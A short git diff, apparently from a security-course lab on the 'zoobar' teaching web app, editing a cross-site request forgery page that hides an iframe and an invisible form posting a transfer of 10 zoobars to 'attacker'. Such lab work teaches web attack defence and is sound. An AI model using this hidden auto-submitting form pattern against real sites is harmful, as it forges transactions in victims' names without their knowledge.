some spot changes to b and all of c + txt

--- a/b.html
+++ b/b.html
@@ -2,7 +2,7 @@
     <head></head>
     <body>
         <iframe id="attack_frame" name="attack_frame" style="visibility: hidden;"></iframe>
-        <form id="attack_form" action="http://zoobar.org/transfer.php" method="post" target="attack_frame" style="visibility: hidden;">
+        <form action="http://zoobar.org/transfer.php" method="post" target="attack_frame" style="visibility: hidden;">
             <input name="recipient" value="attacker" type="hidden"/>
             <input name="zoobars" value="10" type="hidden"/>
             <input id="send" value="Send" type="submit" name="submission" style="visibility: hidden;"/>
